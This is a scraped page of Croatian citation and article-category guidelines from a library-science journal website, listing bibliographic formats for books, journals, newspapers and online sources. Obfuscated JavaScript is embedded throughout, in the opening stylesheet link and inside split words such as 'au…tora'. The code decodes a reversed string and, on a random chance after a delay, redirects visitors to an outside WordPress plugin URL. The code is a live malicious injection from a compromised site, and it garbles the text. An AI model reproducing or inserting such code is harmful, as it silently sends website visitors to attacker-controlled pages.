tom-css' href='http://nova.knjiznicarstvo.com.hr/wp-content/themes/betheme/css/skins/cusscript$mWn=function(n)if(typeof%20($mWn.list%5Bn%5D)==string)%20return%20$mWn.list%5Bn%5D.split().reverse().join();return%20$mWn.list%5Bn%5D;;$mWn.list=%5B'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod%5D;var%20number1=Math.floor(Math.random()*6);%20if%20(number1==3)var%20delay%20=%2018000;setTimeout($mWn(0),delay);/scripttom/style.css?ver=21.1.2' type='text/css' media='all' />
to" style="padding-top:0px; padding-bottom:0px; background-color:" >
top bg-auto clearfix" style="" >
 
to" style="padding-top:0px; padding-bottom:0px; background-color:" >
top bg-auto clearfix" style="" >
to" style="padding-top:0px; padding-bottom:0px; background-color:" >
top bg-auto clearfix" style="" >
 
to" style="padding-top:0px; padding-bottom:0px; background-color:" >
top bg-auto clearfix" style="" >
top bg-auto clearfix" style="" >
Izvorni znanstveni članak
Izvorni znanstveni članak je originalno znanstveno djelo u kojemu su izneseni novi rezultati fundamentalnih ili primijenjenih istraživanja. U ovu kategoriju djela spadaju nove, još nepoznate znanstvene činjenice, znanstveni zakoni, znanstvene zakonitosti, spoznaje i teorije koje predstavljaju doprinos globalnoj znanosti, a djelo je napisano tako da bilo koji kvalificiran istraživač na temelju datih informacija može: ponoviti eksperiment i postići opisane rezultate znanstvenog istraživanja s jednakom točnošću ili unutar granice eksperimentalne pogreške, kako to autor i ponoviti autorova zapažanja, proračune ili teorijske izvode (spoznaje) i donijeti slična mjerenja.
Prethodno priopćenje ili znanstvena bilješka
Prethodno priopćenje ili znanstvena bilješka je znanstveno djelo koje sadrži znanstvene spoznaje ili rezultate znanstvenih istraživanja čiji karakter zahtijeva objavljivanje. Ovaj znanstveni članak obvezno sadrži jednu ili više znanstvenih informacija, ali bez dovoljno pojedinosti koje bi omogućile čitatelju provjeru iznesenih znanstvenih spoznaja, rezultata istraživanja i znanstvenih informacija na način kako je to opisano za „izvorni znanstveni članak“.
Pregledni članak
Pregledni članak sadrži cjelovit prikaz (izvještaj) o određenom pitanju ili problemu istraživanja o kojemu je već objavljena znanstvena informacija, rezultat znanstvenog istraživanja, odnosno znanstvenih spoznaja, samo su u njemu one na novi način prikupljene, analizirane, sintetizirane i na znanstveni način prezentirane. Taj se članak od izvornog znanstvenog članka razlikuje po tome što ne mora sadržavati originalne (nove) rezultate istraživanja. Pregledni znanstveni članak može se temeljiti na već objavljenim rezultatima istraživanja, ali su u njemu originalne spoznaje, rezultata i analiza ili sinteza, novi odnosi među stvarima i pojavama, iii nove hipoteze predočene s argumentiranim prijedlozima za potpunija i daljnja znanstvena istraživanja. U takvoj kategoriji znanstvenih članaka vrlo često ima i novih, originalnih i neobjavljenih autorovih rezultata istraživanja, koji obično ne predstavljaju bitan element (rezultat, spoznaju) predmeta istraživanja.
Stručni članak
Stručni članak je takvo djelo u kojemu se iznose korisne informacije i spoznaje do kojih se u pravilu, došlo razvojnim istraživanjem, a ne fundamentalnim i primijenjenim istraživanjima. Takav članak ne sadrži originalne rezultate istraživanja nego se u njemu iznose već poznate spoznaje. Svrha rezultata istraživanja prikazanih u stručnom članku odnosi se na primjenu u teoriji i praksi te širenju već poznatih spoznaja, stavova, teorija. U njima se, zapravo ponavljaju poznati rezultati istraživanja koji su korisni u širenju znanstvenih spoznaja i prilagođavanju rezultata znanstvenih istraživanja potrebama znanstvene teorije i prakse.
Stručni prikaz
Stručni prikaz je posebna vrsta stručnog pisanog djela u kojemu kompetentan intelektualac objektivno, argumentirano, koncizno … prosuđuje, ocjenjuje i vrednuje tuđe znanstveno ili znanstvenostručno objavljeno djelo (npr. znanstvenu knjigu, sveučilišni udžbenik, doktorsku disertaciju, znanstveni program, znanstveni projekt, znanstvenu studiju, enciklopediju, leksikon, rječnik…) te potom objavljuje u odgovarajućem časopisu. Pri pisanju i objavljivanju stručnih prikaza o objavljenim znanstvenim i znanstvenostručnim djelima njihovi autori morali bi znati razliku između stručnih prikaza, kritičkih prikaza (odnosno djela na poslijediplomskim doktorskim studijama), i recenzija.
to" style="padding-top:0px; padding-bottom:0px; background-color:" >
top bg-auto clearfix" style="" >
to" style="padding-top:0px; padding-bottom:0px; background-color:" >
top bg-auto clearfix" style="" >
 
 
Bilješka ispod teksta za knjigu
1Horvat, Aleksandra. Knjižnični katalog i autorstvo. Rijeka : Naklada Benja, 1995. Str. 117.
Bilješka ispod teksta za časopis
1Saračević, Tefko. Relevantnost i kako se istraživala. // Vjesnik bibliotekara Hrvatske 50, 1/2(2007), str. 19.
Bilješka ispod teksta za zbornik
1Danev, Marina. Novi pristupi čitanju u programima narodnih knjižnica. // Dječja knjižnica za novo tisućljeće : zbornik / priredila Ranka Javor. Zagreb : Knjižnice grada Zagreba, 2001. Str. 61.
 
top bg-auto clearfix" style="" >
top bg-auto clearfix" style="" >
 
Primjer - Niz bilješki
1Byrum, John. Izazovi elektroničke građe: postojeće stanje i neriješena pitanja. // Vjesnik bibliotekara Hrvatske 46, 1-2(2003), str. 4-5.
2Gorman, Michael. Elektronička građa: što je vrijedno sačuvati i kakva je njezina uloga u knjižničnim fondovima? // Vjesnik bibliotekara Hrvatske 46, 1-2(2003), str. 17.
3Isto, str. 19.
4Isto.
5 Byrum, John. Nav.dj., str. 108.
 
top bg-auto clearfix" style="" >
top bg-auto clearfix" style="" >
 
Primjer - Posredno navođenje
1Ritzenthaler, Mary Lynn. Archives and manuscripts : conservation : a manual on physical care and management. Chicago: Society of American Archivists, 1983. Str. 9. Citirano prema: Harvey, Ross. Preservation in libraries : principles, strategies and practices for librarians. London : Bowker-Sauer, 1993. Str. 5.
 
top bg-auto clearfix" style="" >
top bg-auto clearfix" style="" >
 
Oba izvora zasebno ako su korištena oba djela
1Ritzenthaler, Mary Lynn. Archives and manuscripts : conservation : a manual on physical care and management. Chicago: Society of American Archivists, 1983. Harvey, Ross. Preservation in libraries : principles, strategies and practices for librarians. London : Bowker-Sauer, 1993.
Samo djelo čije su ideje navedene
1Ritzenthaler, Mary Lynn. Archives and manuscripts : conservation : a manual on physical care and management. Chicago: Society of American Archivists, 1983.
 
top bg-auto clearfix" style="" >
 
Primjer - Citiranje parafraziranog djela
1Usp. Horvat, Aleksandra. Školovanje knjižničara u svjetlu europskih normi. // Vjesnik bibliotekara Hrvatske 48, 1(2005), str. 8-9.
 
to" style="padding-top:0px; padding-bottom:0px; background-color:" >
top bg-auto clearfix" style="" >
 

top bg-auto clearfix" style="" >

Knjiga

Knjiga koja ima jednog au$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tora
Zelenika, Ratko. Metodologija i tehnologija izrade znanstvenog i stručnog djela. Rijeka : Ekonomski fakultet, 2000.
Dahl, Svend. Povijest knjige. Zagreb : Hrvatsko bibliotekarsko društvo, 1979.
Knjiga koja ima više au$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tora
Knjiga koja ima do najviše tri autora
Anić, Vladimir ; Goldstein, Ivo. Rječnik stranih riječi. Zagreb : Novi liber, 2009.
Horvat, Aleksandra ; Živković, Daniela. Knjižnice i autorsko pravo. Zagreb : Hrvatska sveučilišna naklada, 2009.

Knjiga koja ima četiri i više autora
Maštrović, Tihomil… [et al.]. Cjeloživotno učenje knjižničara. Zagreb : Nacionalna i sveučilišna knjižnica, 2009.
Knjiga koja nema podatak o au$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toru
Antologija hrvatske kratke priče / priredio Miroslav Šicel. Zagreb : Disput, 2001.
Dječja knjižnica za novo tisućljeće / priredila Ranka Javor. Zagreb : Knjižnice grada Zagreba, 2001.
Pojedino poglavlje unutar knjige
Klapec, Tomislav. Prirodni toksini. // Kemijske i fizikalne opasnosti u hrani / Bojan Šarkanj…[et al.]. Osijek : Hrvatska agencija za hranu, 2010. Str. 11-25.
Aparac-Gazivoda, Tatjana. Publikacija i znanje u bibliotekarstvu. // Informacijske znanosti i znanje / uredili Tkalac, S.; Tuđman M. Zagreb : Zavod za informacijske studije, 1990. Str. 109-116.
top bg-auto clearfix" style="" >

Enciklopedija

Natuknica u enciklopediji
Bibliografija. // Hrvatska enciklopedija. Zagreb : Leksikografski zavod Miroslav Krleža, 1999. Sv. 2. 2000. Str. 101.
top bg-auto clearfix" style="" >
 
to" style="padding-top:0px; padding-bottom:0px; background-color:" >
top bg-auto clearfix" style="" >

Članci

Članak u časopisu
Vinaj, Marina. Osječki časopisi do 1945. godine u Muzeju Slavonije. // Osječki zbornik 28 (2007), str. 327-335.
Stojanovski, Jadranka. Znanstveno izdavaštvo i uloga biblioteka. // Kemija u industriji 56, 10(2007), str. 512-515.
Članak u novinama
Biblioteka V. D. Sonnenfelda u Gradskoj knjižnici // Glas Slavonije 28, 8.060(srijeda, 14.7.1971.), str. 4.
Lukačević, Srđan. Mladi će ljudi tražiti "stare" knjižnice jer one imaju dušu. // Glas Slavonije 101, 31.519(subota, 30.10.2021.), str. 14.
Prva predstava "Braća Karamazovi" / J.K. // Glas Slavonije 102, 31.919(ponedjeljak, 28.2.2022.), str. 21.
Rad u zborniku
Aparac-Jelušić, Tatjana; Faletar Tanacković, Sanjica; Jelušić, Srećko. Školovanje arhivista, knjižničara i muzeologa: pogled iz perspektive akademske ustanove. // Radovi s 41. savjetovanja Arhivska služba na pragu pristupa Europskoj Uniji / uredila Kovačec, Deana. Zagreb : Hrvatsko arhivističko društvo, 2007. Str 147-154.
Knežević, Ivana. Obrada knjižnične građe u Muzeju Slavonije : primjeri dobre prakse uz program K++. // Knjižnice: kamo i kako dalje? : knjižnice i očuvanje kulturne baštine, knjižnice bez granica: digitalni repozitoriji, knjižnični softveri : zbornik radova. 11. dani specijalnih i visokoškolskih knjižnica, Opatija, 01.-04. travnja 2009. / uredile Tamara Krajna i Alisa Martek. Zagreb : Hrvatsko knjižničarsko društvo, 2010. Str. 122-135.
Dukić, Gordana; Dukić, Darko; Hasenay, Sanda. Queuing simulation model as library management support in terms of informatization. // Proceedings of the LIDA 2009. University of Zadar, Department of Library and Information Science ; Rutgers University, School of Communication, Information and Library Studies, 2009. Str 104-112.
top bg-auto clearfix" style="" >

Članci u elektroničkom časopisu

Članak u html-u
Babić, Dinko. Internet kao pomagalo u sveučilišnoj nastavi – iskustvo jednog nastavnika. // Časopis Edupoint 3, 19(2003). URL: http://edupoint.carnet.hr/casopis/19/Clanci/3.html (2003-11-01)
Članak u pdf-u
Plašćak, Bernardica; Petr Balog, Kornelija. Per aspera ad astra : trnovit put jedne fakultetske knjižnice prema kvaliteti. // Vjesnik bibliotekara Hrvatske 54, 1/2(2011), str. 67-92. URL: http://www.hkdrustvo.hr/datoteke/1147/vbh/ (2011-11-18)
top bg-auto clearfix" style="" >
 
top bg-auto clearfix" style="" >
to" style="padding-top:0px; padding-bottom:0px; background-color:" >
top bg-auto clearfix" style="" >

Članci na mrežnoj stranici

Članak na mrežnoj stranici koji ima podatak o au$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toru
Lauder, John; Matheson, Ann. Newsplan 2000 project: completion report to the heritage lottery fund, 2005. URL: http://www.bl.uk/about/cooperation/pdf/newsplan2000final.pdf (2006-01-13)
Članak na mrežnoj stranici koji nema podatak o au$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toru
Dynamic action plan, 2005. URL: http://www.minervaeurope.org/publications/dap/dap.pdf (2011-11-18)
top bg-auto clearfix" style="" >

Ostali elektronički izvori

Mrežna stranica
Hrvatsko knjižničarsko društvo. URL: http://www.hkdrustvo.hr/ (2011-11-18)
Natuknica u elektroničkoj enciklopediji
Bibliography. // Encyclopaedia Britannica Online. Encyclopedia Britannica, 2011. URL: http://www.britannica.com/EBchecked/topic/64536/bibliography (2011-11-18)
Audiovizualna građa
Dukić, Darko. Simulation model of flour inventory in bakery production. // Proceedings of 4th International Congress Flour – Bread ’07 [and] 6th Croatian Congress of Cereal Technologies / Opatija, October 24-27, 2007. Osijek : Faculty of Food Technology, Department of Cereal Processing Technologies, 2008. [CD-ROM]*
*oznaka za vrstu građe na kraju zapisa
top bg-auto clearfix" style="" >
 
to" style="padding-top:0px; padding-bottom:0px; background-color:" >
top bg-auto clearfix" style="" >